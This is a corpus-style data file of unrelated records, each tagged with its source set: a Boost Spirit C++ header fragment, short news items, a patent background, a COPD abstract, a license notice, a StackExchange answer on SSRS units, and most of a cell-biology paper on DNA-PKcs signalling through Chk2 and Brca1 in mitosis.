{}; // /////////////////////////////////////////////////////////////////////////// // // Define what attributes are compatible with a sequence // template <typename Attribute, typename Elements, typename Context, typename Iterator> // struct is_attribute_compatible<Attribute, sequence<Elements>, Context, Iterator> // : mpl::or_< // is_convertible<Attribute // , typename traits::attribute_of<sequence<Elements>, Context, Iterator>::type> // , traits::is_fusion_sequence_compatible<qi::domain, Attribute // , sequence<Elements>, Context, Iterator> // , traits::is_container_compatible<qi::domain, Attribute // , sequence<Elements>, Context, Iterator> // > // {}; }}} namespace boost { namespace spirit { namespace traits { /////////////////////////////////////////////////////////////////////////// template <typename Elements> struct has_semantic_action<qi::sequence<Elements> > : nary_has_semantic_action<Elements> {}; /////////////////////////////////////////////////////////////////////////// template <typename Elements, typename Attribute, typename Context , typename Iterator> struct handles_container<qi::sequence<Elements>, Attribute, Context , Iterator> : mpl::true_ {}; }}} #endif
{ "pile_set_name": "Github" }
Check out our new site Makeup Addiction add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption add your own caption Brace Yourselves Videos of black friday madness are coming
{ "pile_set_name": "OpenWebText2" }
Arson investigators are looking into the cause of a fire inside a North Park restaurant Thursday. Around 12:30 a.m. San Diego Police responded to 4095 30th Street, the location of The Ritual Tavern, Kitchen and Garden. Apparently an alarm sounded when someone broke into the back door of the business, officers said. The damaged door and shattered glass were visible behind the restaurant. When officers arrived there were several small fires burning inside the building. "The suspect or suspects used accelerant, it appears, to start several small fires inside," said Lt. Paul Rorrison. Fire crews extinguished the fire before there was any major damage. Check back for updates.
{ "pile_set_name": "OpenWebText2" }
The present invention relates to the art of portable commodes for patient care and invalid assistance. It finds particular application in conjunction with portable commodes having separate, detachable seats or lids, and will be described with particular reference thereto. It is to be appreciated, however, that the invention has broader application and may be advantageously employed in other environments. Heretofore, commode seats and lids have been received on portable commode frames by various means. For instance, fastening devices such as nuts, bolts or screws have been used to mount seats and lids directly to portable commode frames. Fasteners have also been used to mount seats and lids when hinges were used. It has also been known to mount commode seats or lids to portable commode frames using clamps. These clamps were fastened onto the seat or lid with a metal fastener, and were configured to clip around the outer periphery of a portable commode tubular cross bar member. There are a number of problems with the above-mentioned techniques for attaching seats or lids to portable commode frames. First, such techniques require extra manufacturing steps. Hinges and clamps must be fastened into place, and the seat or lid must then be attached to the frame. Second, many of the prior art clamps, hinges and fasteners are made of metal, and tend to rust or fall away. Finally, many of the prior art clamps are flimsy, and often loosen or loose their shape. This problem results in the seat not remaining securely in place. In portable commodes which have separately detachable seats or lids, it is desirable that no separate fasteners, hinges or clamps be required in mounting the seat or lid on the portable commode frame. Previous portable commodes which had separately detachable seats or lids required additional fasteners and hinge members, and provided excessive manufacturing steps in forming the portable commode. It would be desirable to have a portable commode with a detachable seat or lid wherein the seat or lid would be securely received on the portable commode frame without the use of additional fasteners, clamps or hinges. The present invention contemplates a new and improved portable commode which overcomes the above-referenced problems and others.
{ "pile_set_name": "USPTO Backgrounds" }
Grading the severity of obstruction in patients with chronic obstructive pulmonary disease and morbid obesity. To evaluate the severity of airway obstruction in patients affected by chronic obstructive pulmonary disease (COPD) in the presence of concomitant restriction due to morbid obesity. Lung function test, six-minute walking distance (6MWD) test, body mass index measurement (BMI), and determination of dyspnoea using the Modified Medical Research Council Dyspnoea Scale (MMRC) were performed on each patient referred to our department according to their individual respiratory diagnosis or symptoms. Analysis was performed on smokers or ex-smokers patients, with both dyspnoea and chronic productive cough, showing non fully reversible airflow obstruction, with normal-weight (NW: BMI 22 to 24 kg/m2) or morbid-obesity (MO: BMI > or = 40 kg/m2). In 33 COPD patients, spirometric data differ between NW and MO only in fixed FEV1/FVC ratio (50 +/- 9 and 62 +/- 7, respectively; p = 0.0001) and FEV1/SVC % of predicted (57 +/- 15 and 71 +/- 11, respectively; p = 0.005). Furthermore, SVC was found to exceed FVC only in NW (2.82 +/- 0.7 L and 2.08 +/- 0.9 L, respectively; p = 0.03). NW and MO differ significantly also in MMRC (3.4 +/- 0.9 vs 2.4 +/- 1, respectively; p = 0.004), 6MWD in metres (226 +/- 100 and 331 +/-110, respectively, p = 0.007), 6MWD as % predicted (49 +/- 22 and 81 +/- 23, respectively; p = 0.0003), and BODE index (5.8 +/- 2 and 3.6 +/- 2, respectively; p = 0.003). There is a significant overgrading of obstruction in morbidly obese patients affected by COPD. Therefore, we suggest that an alternative grading system be used for patients with mixed ventilatory dysfunction.
{ "pile_set_name": "PubMed Abstracts" }
# Acknowledgements This application makes use of the following third party libraries: ## WHUCalendar Copyright (c) 2016 tiger8888 <seekarmor@139.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Generated by CocoaPods - https://cocoapods.org
{ "pile_set_name": "Github" }
Australia's Peter Senior, 53, became the oldest Australian Open champion by 10 years, as the previous record holder was Peter Thomson, who won the title at age 43. In case you missed it this weekend, Australia's Peter Senior pulled off an amazing feat Down Under, winning the Australian Open at the age of 53, to become the tournament's oldest winner. It was the second Australian Open title for the appropriately named Senior, but the incredible thing about it is that his two wins came 23 years apart -- also a record. As reported by Martin Blake of emiratesaustralianopen.com.au: He is the oldest winner of any top-level Australian tour event, having set the previous record himself when he won the Australian PGA at Coolum in 2010 at 51. "It doesn’t get any better than this," said Senior, a profoundly popular figure in the Australian golf industry over three decades. Kudos to Senior. It seems all we talk about lately is the supreme talent of players at such a young age. For instance, New Zealand's Lydia Ko became the youngest LPGA winner earlier this season when she captured the Canadian Women's Open at 15 years, 4 months and 3 days. More recently, Guan Tianlang of China -- just 14 years old -- became the youngest player ever to qualify for the Masters after his win at the Asia-Pacific Championship in November. While it's fantastic to see that the future of the game is in great hands with the performances of these young players, it's also nice on occasion to see someone like Senior get the job done.
{ "pile_set_name": "Pile-CC" }
Q: SSRS 2008 R2 / 2012 Width Property Unit of Measure Default Setting Is there a way to configure the default unit of measure for the width / height properties used to size cells / rows? If I add a table and configure the width of the columns to a value specified in "pt" rather than "cm" I have to change them all as I specify the width (I am using pt to get over the inexplicable inability of SSRS to correctly align columns when exported to Excel). Is there a way I can change from cm to pt as the default value for all measures in a report? A: Imperial or metric, as I understand, is simply based on the windows regional setting. Further customization of the default past that isn't currently possible. I've seen one work around that modifies the report template which can potentially make your life easier but this approach has limitations as well. Looking through Microsoft connect I don't see this posted yet as a feature request. It seems to me that this would be an excellent suggestion.
{ "pile_set_name": "StackExchange" }
Introduction ============ Chromosome instability (CIN), characterized by increased frequency of gain or loss of the whole chromosomes, has long been implicated in tumorigenesis, poor patient prognosis and drug resistance.^[@bib1]^ The most common cause of CIN in cancer cells is a defect in the dynamics of kinetochore-microtubule (k-MT) attachment during mitosis.^[@bib2]^ An evolutionarily conserved spindle assembly checkpoint mechanism has evolved to ensure proper completion of all k-MT attachments before chromosomal segregation.^[@bib3]^ Certain improper k-MT attachments (for example, merotelic attachment with microtubules orientated from both spindle poles) can escape from spindle assembly checkpoint surveillance and persist into the lagging chromosome; these are observed at the spindle midzone during anaphase.^[@bib2]^ Abnormal k-MT attachments occur frequently in early mitosis but are efficiently corrected in normal cells.^[@bib4]^ In cancer cells with CIN, however, stability of k-MT attachments increases, hindering the ability to correct the abnormal k-MT attachment.^[@bib5]^ In addition, abnormal spindle assembly with extra centrosomes significantly increases the frequency of lagging chromosomes during anaphase, indicating that centrosome instability is also a major source of abnormal k-MT attachment.^[@bib6]^ Centrosome hypertrophy is an accepted cause of CIN and is frequently correlated with tumorigenesis.^[@bib7]^ Moreover, centrosome instability is highly linked to certain tumor suppressor protein mutations (for example, those in Brca1).^[@bib8],\ [@bib9]^ Brca1 is a product of a breast and ovarian cancer susceptibility gene and participates in a variety of cellular processes, including DNA damage repair, cell cycle checkpoint response, chromatin remodeling and mitotic progression regulation.^[@bib10]^ The involvement of Brca1 in centrosome regulation was recognized upon analysis of *BRCA1*^−/−^ mice fibroblasts, which contain amplified centrosomes.^[@bib11]^ Brca1 localizes to centrosomes during mitosis, and its ubiquitin ligase activity ensures normal centrosome number and function.^[@bib9],\ [@bib12]^ The direct target of Brca1 in the centrosome is γ-tubulin.^[@bib8]^ Cells that express mutant γ-tubulin that cannot be ubiquitinated by Brca1 are characterized by centrosome amplification; a Brca1 mutant that lacks E3-ligase enzyme activity also loses its effect on centrosome nucleation inhibition.^[@bib12],\ [@bib13],\ [@bib14]^ Chk2 is another centrosome localization tumor suppressor. In response to DNA double-stranded breaks, DNA damage sensor kinase ataxia telangiectasia mutated (ATM) phosphorylates Chk2 at Thr68 residue promoting Chk2 homodimerization and full activation.^[@bib15]^ Phosphorylated Chk2 Thr68 reportedly localizes at centrosomes during mitosis;^[@bib16]^ however, its role in mitotic regulation has not yet been established. Stolz *et al.*^[@bib17]^ recently demonstrated that Chk2 is required for proper and timely spindle formation during normal mitosis; this is critical for accurate attachment of kinetochores to the spindle microtubules and subsequent proper chromosome segregation. Chk2 phosphorylates Ser988 of Brca1, which is important for the function of Brca1 in switching error-prone non-homologous end-joining (NHEJ) to error-free homologous recombination.^[@bib18],\ [@bib19],\ [@bib20]^ Chk2 also phosphorylates Brca1 on Ser988 during normal mitotic progression in the absence of DNA damage. Wild-type Brca1, but not the Ser988 to alanine mutant, can rescue the mitosis defect induced by Chk2 deficiency, suggesting that phosphorylation of Brca1 at this site has an important role in mitotic spindle assembly and chromosome stability maintenance. Moreover, Chk2 deficiency increases CIN and leads to aneuploidy even in chromosomal-stable human colon carcinoma HCT116 cells.^[@bib17]^ How Chk2 is activated in normal mitosis is still an unanswered question. The catalytic subunit of DNA-dependent protein kinase (DNA-PKcs) is an essential component in the NHEJ pathway of double-stranded DNA break repair.^[@bib21]^ In response to double-stranded breaks, DNA-PKcs is rapidly phosphorylated on its Thr2609 and Ser2056 clusters by ATM and by itself.^[@bib22],\ [@bib23]^ In addition to its established role in DNA repair, we observed that DNA-PKcs phosphorylated at both Thr2609 and Ser2056 localizes at the mitotic spindle apparatus on centrosomes and kinetochores. Consistent with this localization, DNA-PKcs is important for the stabilization of centrosome and of the spindle structure, as well as in the regulation of mitotic progression.^[@bib24]^ DNA-PKcs regulates mitotic catastrophe in response to irradiation at least partially via the Chk2 pathway;^[@bib25]^ however, whether Chk2 is a target of DNA-PKcs during normal mitotic progression and its biological significance in mitotic spindle assembly has not been clarified. In the present study, we demonstrate that DNA-PKcs regulates Chk2 phosphorylation at the Thr68 site during mitosis and that DNA-PKcs coordinates the spindle assembly and kinetochore/microtubule attachment through the Chk2--Brca1 signaling pathway. We also show that the deficiency of DNA-PKcs leads to chromosomal instability. These results demonstrate that DNA-PKcs mediates Chk2 phosphorylation to regulate microtubule nucleation and the spindle damage response. Results ======= Chk2 is phosphorylated at Thr68 by DNA-PKcs during mitosis ---------------------------------------------------------- Chk2 is the key downstream effector of the ATM signaling pathway for cell cycle checkpoint regulation in the DNA damage response.^[@bib26]^ In addition, Chk2 is activated during normal mitosis, as monitored by Thr68 phosphorylation, and is required for proper mitotic spindle assembly and chromosomal stability.^[@bib27]^ We have reported that DNA-PKcs is also activated and has a critical role in mitosis progression.^[@bib21]^ To test the hypothesis that DNA-PKcs is involved in Chk2 activation during mitosis, human colon cancer HCT116 cells and isogenic DNA-PKcs knockout cells (DNA-PKcs^−/−^) were mitotically synchronized or were treated with ionizing radiation. Western blot analyses revealed significant Chk2 Thr68 phosphorylation in HCT116 cells but little in DNA-PKcs^−/−^ cells ([Figure 1a](#fig1){ref-type="fig"}). In contrast, ionizing radiation-induced Chk2 Thr68 phosphorylation (mediated by the ATM kinase) was observed in DNA-PKcs^−/−^ cells at levels comparable to those in HCT116 cells. Similarly, siRNA-mediated depletion of DNA-PKcs from HeLa cells abolished the increase of Chk2 Thr68 phosphorylation in mitotically synchronized cells but not in irradiated cells ([Figure 1b](#fig1){ref-type="fig"}). Mitosis-dependent Chk2 phosphorylation was also clearly detected in the isogenic and NHEJ-defective Ligase4^−/−^ cells ([Supplementary Figure S1A](#sup1){ref-type="supplementary-material"}), indicating that Chk2 phosphorylation in mitosis is independent of DSB repair regulation. To further examine the role of the kinase activity of DNA-PKcs on Chk2 activation in mitosis, the parental HCT116 cells were synchronized via nocodazole treatment and then they were incubated for 2 h with DNA-PKcs kinase inhibitor Nu7441. As shown in [Figure 2a](#fig2){ref-type="fig"}, Nu7441 effectively abolished Chk2 Thr68 phosphorylation in response to mitosis synchrony but did not affect the levels of Thr68 phosphorylation induced by irradiation. The blocking of mitotic Chk2 phosphorylation was not due to alternation in mitosis synchrony as histone H3 Ser10 phosphorylation was equivalent in sham- and Nu7441-treated HeLa cells. Mitotic Chk2 phosphorylation was also elicited by treatment of cells with the microtubule stabilizer paclitaxel. Paclitaxel-mediated Chk2 Thr68 phosphorylation was abolished by treatment of cells with an siRNA targeted against the gene encoding DNA-PKcs or by Nu7441 treatment ([Supplementary Figures S1B and C](#sup1){ref-type="supplementary-material"}, respectively). In contrast, ATM kinase inhibitor Ku55933 had no effect on mitosis-induced Chk2 phosphorylation but did effectively block IR-induced Chk2 phosphorylation ([Figure 2b](#fig2){ref-type="fig"}). Taken together, these results demonstrate that DNA-PKcs, but not the ATM kinase, activates Chk2 during mitosis. DNA-PKcs is required for mitotic spindle assembly and chromosomal stability --------------------------------------------------------------------------- During the prometaphase to metaphase transition, kinetochores of sister chromatid pairs are captured by microtubules of opposite poles to allow chromosomes to align at the center of the spindle before the sister-chromatid separation at anaphase. Stolz *et al.*^[@bib17]^ reported that Chk2 activation is necessary for proper spindle organization and chromosome segregation during normal mitosis and that Chk2 deficiency resulted in chromosomal numerical instability. Similarly, we observed that there was an increase of chromosomal numerical instability in DNA-PKcs^−/−^ cells as compared with the parental HCT116 cells and Ligase4^−/−^ cells ([Figure 3a](#fig3){ref-type="fig"}). To further explore the involvement of DNA-PKcs in mitotic spindle assembly, HCT116, DNA-PKcs^−/−^ and Ligase4^−/−^ cells were treated with nocodazole and then with proteasome inhibitor MG132 to stall mitosis progress at the metaphase to anaphase transition. Abnormal mitotic spindles were examined via immunofluorescence staining. Cells with misaligned chromosomes were scored ([Figure 3b](#fig3){ref-type="fig"}). DNA-PKcs^−/−^ cells had a higher proportion of chromosomal misalignment during the metaphase to anaphase transition than did the parental HCT116 cells or the Ligase4^−/−^ cells ([Figure 3d](#fig3){ref-type="fig"}). Abnormal mitotic spindles were further examined via analysis of chromosome lagging in anaphase cells, an indication of chromosomal instability or errors during chromosomal segregation. Exponentially growing HCT116, DNA-PKcs^−/−^ and Ligase4^−/−^ cells were scored for chromosome lagging in anaphase ([Figure 3c](#fig3){ref-type="fig"}). Lack of DNA-PKcs, but not of Ligase4, caused a significant increase of lagging chromosomes in HCT116 cells ([Figure 3e](#fig3){ref-type="fig"}), which is consistent with the increase of aneuploidy found in DNA-PKcs^−/−^ cells but not in Ligase4^−/−^ cells ([Figure 3a](#fig3){ref-type="fig"}). Transient knockdown of levels of DNA-PKcs using an siRNA or treatment with DNA-PKcs inhibitor Nu7441 also promoted abnormal spindles and lagging chromosomes in HeLa cells ([Supplementary Figure S2](#sup1){ref-type="supplementary-material"}). These results further demonstrated the importance of DNA-PKcs and its kinase activity in mitotic spindle assembly and maintenance of chromosomal stability. The Chk2--Brca1 pathway mediates DNA-PKcs signaling in spindle organization --------------------------------------------------------------------------- To further test the function of DNA-PKcs-dependent Chk2 phosphorylation in spindle assembly and chromosomal stability, wild-type Chk2 and Chk2 mutants with an alanine (to prevent phosphorylation) or aspartic acid (to mimic the phosphorylated state) substitution at Thr68 residue (T68A and T68D, respectively) were expressed in DNA-PKcs^−/−^ cells ([Figure 4a](#fig4){ref-type="fig"}). Overexpression of wild-type Chk2 or of the T68A mutant did not alter the frequencies of chromosomal misalignment and lagging in DNA-PKcs^−/−^ cells as compared with control cells transfected with empty vector, whereas overexpression of the phosphomimetic Chk2 T68D mutant significantly decreased the levels of these abnormalities during mitosis ([Figure 4b](#fig4){ref-type="fig"}). T68D mutant Chk2 was able to restore proper chromosomal alignment and alleviate anaphase lagging in HCT116 cells, whereas vector alone had no effect. Chk2 is known to phosphorylate Brca1 at Ser988 upon DNA damage, which facilitates Brca1 function in DSB repair.^[@bib18],\ [@bib19],\ [@bib20]^ The involvement of Chk2 signaling in mitosis and spindle assembly has also been linked to Brca1 Ser988 phosphorylation.^[@bib17]^ To test whether Brca1 also functions in the same signaling pathway downstream from DNA-PKcs, wild-type Brca1 and non-phosphorylatable or phosphomimetic Brca1 mutants (S988A and S988E, respectively) were overexpressed in DNA-PKcs^−/−^ cells ([Figure 4c](#fig4){ref-type="fig"}). As was observed in Chk2 overexpression experiments, the phosphomimetic Brca1 mutant, but not wild-type Brca1 nor the S988A mutant, was able to rescue mitotic defects in DNA-PKcs^−/−^ cells ([Figure 4d](#fig4){ref-type="fig"}). Taken together, our analyses revealed that Chk2 and Brca1 are the downstream effectors of DNA-PKcs signaling in mitotic regulation. DNA-PKcs inactivation leads to dysfunction of microtubule dynamics ------------------------------------------------------------------ Improper regulation of microtubule dynamics is associated with aberrant mitotic spindle and chromosomal instability.^[@bib28]^ The Chk2--Brca1 signaling axis has also been implicated in regulation of microtubule dynamics in response to spindle damage.^[@bib29],\ [@bib30]^ To further investigate the involvement of DNA-PKcs in microtubule regulation, HCT116 and DNA-PKcs^−/−^ cells were treated with nocodazole in chilled medium to depolymerize microtubules. Microtubule nucleation and regrowth was initiated upon removal of nocodazole-containing medium and addition of prewarmed fresh medium. Microtubule nucleation status was inferred based on the diameter of asters, the radial arrays of microtubules that grow from centrosomes ([Figure 5a](#fig5){ref-type="fig"}). Our analyses revealed that microtubule growth was significantly enhanced in DNA-PKcs^−/−^ relative to HCT116 cells ([Figure 5b](#fig5){ref-type="fig"}). To determine the role of Chk2 and DNA-PKcs in microtubule regulation, HeLa cells stably expressing wild-type or T68A or T68D mutant Chk2 were transfected with siRNA targeting the gene encoding DNA-PKcs. Cells were analyzed for microtubule regrowth as described above. Depletion of DNA-PKcs caused a significant outgrowth of microtubules in cells expressing wild-type Chk2, the T68A mutant and the vector control but not in cells expressing Chk2 T68D ([Figure 5c](#fig5){ref-type="fig"} and [Supplementary Figure S3](#sup1){ref-type="supplementary-material"}). These results indicate that the phosphomimetic Chk2 T68D mutant protein can compensate for the loss of DNA-PKcs and prevent dysregulation of microtubule dynamics in mitosis. Microtubule formation in Brca1-deficient cancer cells is abnormal when cells are treated with an anti-microtubule agent such as paclitaxel.^[@bib31],\ [@bib32]^ The connection of DNA-PKcs and Chk2--Brca1 signaling in regulation of microtubule dynamics prompted us to speculate that DNA-PKcs modulates cellular sensitivity toward paclitaxel. To test the hypothesis, HCT116 and DNA-PKcs^−/−^ cells were treated with paclitaxel and were subjected to a clonogenic survival assay. Our analysis revealed that DNA-PKcs deficiency in HCTT116 cells did confer paclitaxel resistance in clonogenic survival assay ([Figure 6a](#fig6){ref-type="fig"}). In addition, the colony sizes of HCT116 cells were obviously smaller than those of DNA-PKcs^−/−^ cells (data not shown). Similarly, an MTT cell viability assay revealed that DNA-PKcs^−/−^ cells were more resistant to paclitaxel than were the parental HCT116 cells ([Figure 6b](#fig6){ref-type="fig"}). Discussion ========== We have previously reported that DNA-PKcs is autophosphorylated during normal cell cycle progression into mitosis and that activation of DNA-PKcs is necessary for microtubule organization at centrosomes and kinetochores, mitotic spindle organization and chromosomal segregation.^[@bib24]^ In the current study, we report that DNA-PKcs is the upstream regulator of the Chk2--Brca1 signaling pathway, which was known to regulate mitotic spindle formation and maintenance of chromosomal stability. Our results demonstrate that mitotic induction of Chk2 phosphorylation at Thr68 is primarily mediated by DNA-PKcs; inhibition of DNA-PKcs via different approaches eliminated mitotic Chk2 phosphorylation. This is in contrast to ATM-dependent Chk2 phosphorylation under the DNA damage conditions.^[@bib33]^ Chk2 activation has been linked to its downstream effector molecule Brca1 in both DNA damage response and normal mitosis progression, and Chk2-dependent Brca1 phosphorylation at Ser988 is critical for proper assembly of the mitotic spindle and for chromosomal stability.^[@bib17]^ Our analyses revealed that overexpression of phosphomimetic mutants of Chk2 (T68D) or Brca1 (S988E) but not their wild-type counterparts compensated for the loss of DNA-PKcs and decreased chromosomal misalignment and lagging in cells that were deficient in DNA-PKcs ([Figures 4](#fig4){ref-type="fig"} and [5](#fig5){ref-type="fig"}). These results demonstrate that DNA-PKcs, Chk2 and Brca1 are functionally aligned in the pathway that regulates mitotic spindle assembly and guides accurate chromosomal segregation. Our data do not rule out the possibility that, in the absence of DNA-PKcs, a compromised NHEJ mechanism in DSB repair results in aberrant chromosomal structures that hinder chromosomal alignment and segregation in mitosis. However, we did not observe a significant increase in aberrant mitosis in NHEJ-deficient ligase4^−/−^ cells, suggesting that a mechanism independent of both NHEJ and DSB repair but dependent on DNA-PKcs phosphorylation of Chk2 regulates mitosis. The presence of mitotic DNA-PKcs phosphorylation at centrosomes and kinetochores implies that DNA-PKcs is involved in microtubule organization and could modulate k-MT attachment.^[@bib24]^ Accurate chromosome segregation in mitosis relies on the sister kinetochores attached to microtubules emanating from opposite spindle poles. Inaccurate and aberrant k-MT attachments result in CIN, aneuploidy and full-blown carcinogenesis.^[@bib34],\ [@bib35]^ There are three types of k-MT attachment errors in prometaphase: (1) monotelic attachment, in which only one sister kinetochore attaches to microtubule emanating from one pole; (2) syntelic attachment, in which both sister kinetochores bind to microtubules from the same pole; and (3) merotelic attachment, in which a kinetochore is attached to microtubules from both poles. The merotelic attachment is the only attachment error that can escape from the surveillance of the spindle checkpoint, as no kinetochore is left unattached.^[@bib36],\ [@bib37]^ Therefore, cells carrying merotelic kinetochore attachment can progress into anaphase with lagging chromosomes; this is the most common route to gain or loss of a complete chromosome and results in aneuploidy.^[@bib6],\ [@bib35]^ Loss of Brca1 or Chk2 coincides with increased incidents of aneuploidy and merotelic kinetochore attachment.^[@bib27]^ Similarly, there is an increase of misalignment and lagging chromosomes in the absence of DNA-PKcs, and overexpression of phosphomimetic Chk2 T68D or Brca1 S988E partially rescued these aberrances in DNA-PKcs-deficient cells. Thus, it is tempting to speculate that the DNA-PKcs-Chk2--Brca1 pathway triggers correction of merotelic k-MT attachments. Early studies revealed that Brca1 resides at the centrosome throughout all cell cycle phases and suppresses centrosome amplification, microtubule nucleation and aneuploidy.^[@bib30],\ [@bib38]^ Brca1 function in centrosome and microtubule regulation requires its dimerization with Brca1-associated ring domain protein 1 (Bard1) to form an active E3 ubiquitin ligase.^[@bib8]^ A key target of Brca1-dependent ubiquitination is γ-tubulin, which is a component of the γ-tubulin ring complex that anchors microtubule nucleation and growth.^[@bib39]^ The Brca1/Brad1 complex directs γ-tubulin monoubiquitination at lysines 48 and 344 in S/G2 phases, and failure of γ-tubulin monoubiquitination results in a marked amplification of centrosomes and an increase in microtubule nucleation.^[@bib12],\ [@bib14]^ These results thus recapitulate centrosome hyperactivation in Brca1-deficient cells and support a negative regulatory function of Brca1 on microtubule regulation. Such an inhibitory effect on microtubule also requires Chk2-mediated Brca1 phosphorylation at Ser988.^[@bib29]^ Consistent with this model, microtubule regrowth analysis revealed that an enhancement of microtubule nucleation/regrowth occurs in DNA-PKcs-deficient cells and that such dysregulation can be corrected by expression of the phosphomimetic Chk2 T68D mutant ([Figure 5](#fig5){ref-type="fig"} and [Supplementary Figure S3](#sup1){ref-type="supplementary-material"}). It is likely that, in the absence of DNA-PKcs, inadequate activation of the Chk2--Brca1 signaling pathway leads to excessive microtubule nucleation and aberrant microtubule--kinetochore attachment. It has been reported that loss of Brca1 in cancer cells confers resistance to paclitaxel treatment,^[@bib40],\ [@bib41]^ which causes microtubule stabilization and mitotic cell death.^[@bib42]^ Similarly, loss of DNA-PKcs is also associated with paclitaxel resistance, thus further supporting the notion that DNA-PKcs regulates microtubule dynamics via the Chk2--Brca1 pathway. The role of the Chk2--Brca1 pathway in k-MT attachments could be modulated or compensated by the Aurora kinases. Aurora-B kinase is known to have an important role in correcting aberrant microtubule attachment through phosphorylation/activation of the mitotic centromere-associated kinesin (microtubule depolymerizing enzyme MCAK), which depolymerizes microtubules.^[@bib43],\ [@bib44]^ Overexpression of MCAK suppresses lagging chromosomes and aneuploidy owing to the loss of Chk2.^[@bib17]^ However, our result indicates that mitotic activation of DNA-PKcs is independent of Aurora-B regulation (data not shown), suggesting that the DNA-PKcs-Chk2--Brca1 axis acts parallel to the Aurora-B pathway to suppress aberrant microtubule attachment and facilitate chromosomal stability. It has also been reported that Aurora-A kinase phosphorylates Brca1 during mitosis and attenuates its E3 ubiquitin ligase activity.^[@bib45]^ It is possible that DNA-PKcs and Aurora-A are required for a balanced Brca1 activity for optimal regulation of microtubule dynamics and k-MT attachments in mitosis. It is conceivable that the defect in this DNA-PKcs-Chk2--Brca1 signaling pathway will result in chromosomal instability, which not only is a hallmark of cancer cells but also an early event and the driving force for tumorigenesis.^[@bib46]^ The connection of Chk2 and Brca1 to cancer development has been well documented, as they have been recognized as multiorgan cancer susceptibility genes.^[@bib47],\ [@bib48]^ In addition, a growing body of evidence has implicated a role of DNA-PKcs in tumorigenesis.^[@bib49]^ For example, progressive loss of DNA-PKcs expression has been correlated to the advancement in ovarian cancer development.^[@bib50]^ Loss of DNA-PKcs expression has also been found in gastric tumors and correlated to a frameshift mutation of the poly(A)10 tract, as well as microsatellite instability, tumor progression and poor patient survival.^[@bib51],\ [@bib52]^ In addition, reduction in DNA-PKcs activity in peripheral blood lymphocytes has been associated with an increase in chromosomal instability and cancer risk.^[@bib53],\ [@bib54]^ Consistent with these analyses, DNA-PKcs kinase inhibition with small-molecule inhibitor not only attenuated mitotic Chk2 phosphorylation ([Figure 1](#fig1){ref-type="fig"}) but also impaired chromosomal alignment and prolonged mitosis progression.^[@bib24]^ The current study thus provides a molecular mechanism that DNA-PKcs-dependent Chk2--Brca1 signaling pathway is critical for proper chromosomal segregation during mitosis and contributes as a barrier against chromosomal instability and tumorigenesis. In summary, our study suggests that DNA-PKcs is the upstream activator of Chk2 and Brca1. The DNA-PKcs-Chk2--Brca1 pathway has an important role in the maintenance of chromosome stability through the regulation of centrosome homeostasis and proper microtubule attachment to the kinetochore. Our results also highlight the role of DNA-PKcs in the control of microtubule dynamics and the response to microtubule damage. Materials and methods ===================== Cell lines and treatment ------------------------ Human cervical cancer HeLa cells, human colorectal carcinoma HCT116 cells and derivative cells^[@bib55]^ were maintained in α-minimum essential medium supplemented with 10% fetal bovine serum and penicillin/streptomycin in a humidified incubator at 37 °C with 5% CO~2~. For mitosis synchrony, cells were treated with 50 ng/ml nocodazole (Sigma, St Louis, MO, USA) for 16 h; in certain experiments, cells were treated for an additional 2 h with kinase inhibitors before harvest. Cells were treated with ionizing radiation using a Mark-II Cesium-137 irradiator (J L Shepherd and Associates) with or without a 30-min pretreatment with kinase inhibitors. Cells were harvested at 1 h after irradiation. Cell transfection with siRNA oligonucleotides or constructs for expression of Chk2 or Brca1^[@bib18]^ was performed using Lipofectamine 2000 (Invitrogen, Carlsbad, CA, USA) according to the manufacturer\'s instructions. Small inhibitory RNA (siRNA) oligonucleotides against DNA-PKcs were previously described.^[@bib24]^ Immunoblotting and antibodies ----------------------------- Whole-cell lysate preparation and western blotting were performed as previously described.^[@bib22],\ [@bib24]^ For immunofluorescent staining, cells were grown on poly-D-lysine-coated culture slides (BD Pharmingen, San Diego, CA, USA), washed in phosphate-buffered saline (PBS), fixed in PBS containing 4% paraformaldehyde, permeabilized in 0.5% Triton X-100 and blocked in PBS containing 5% bovine serum albumin. The cells were incubated with indicated primary antibodies for 2 h at room temperature, washed with PBS and incubated with Alexa-568- and Alexa-488-conjugated secondary antibodies for 1 h (Invitrogen). Cells were then washed with PBS and mounted in Vectashield mounting medium with 4,6-diamidino-2-phenylindole (Vector Laboratories, Burlingame, CA, USA). Images were acquired from a Zeiss AxioImager M2 microscope system equipped with a Plan-Apochromat 63 × /NA 1.40 objective, an AxioCam MRm CCD camera and AxioVision software (Carl Zeiss, Oberkochen, Germany). Anti-Chk2 total (Cell Signaling, Beverly, MA, USA), anti-phosphorylated Chk2 at Thr68 (Cell Signaling), anti-phospho-histone H3 (EMD Millipore, Billerica, MA, USA), anti-β-actin (Sigma) and anti-Brca1 total (Santa Cruz, Dallas, TX, USA) antibodies were purchased from the indicated vendors. Antibodies against total and phosphorylated forms of DNA-PKcs were described previously.^[@bib22]^ Microtubule nucleation assay ---------------------------- Cells were treated with cold medium containing 10 μg/ml nocodazole for 40 min, washed with PBS and added to prewarmed fresh medium without nocodazole to allow microtubule regrowth. Cells were fixed at the indicated time and subjected to immunofluorescent staining as described above. Clonogenic survival and MTT cell proliferation assays ----------------------------------------------------- Exponentially growing cells were trypsinized and counted. HCT116 cells were diluted serially to appropriate concentrations, plated into 60-mm dishes in triplicate and treated with paclitaxel (0.5, 1, 2 and 6 n[M]{.smallcaps}). Cells were fixed at 10--14 days and were stained with 4% formaldehyde in PBS containing 0.05% crystal violet. Colonies containing \>50 cells were counted. For cell proliferation assays, 1 × 10^4^ cells were seeded per well in a 96-well plate. Cells were cultured with paclitaxel for 72 h, and then were analyzed for 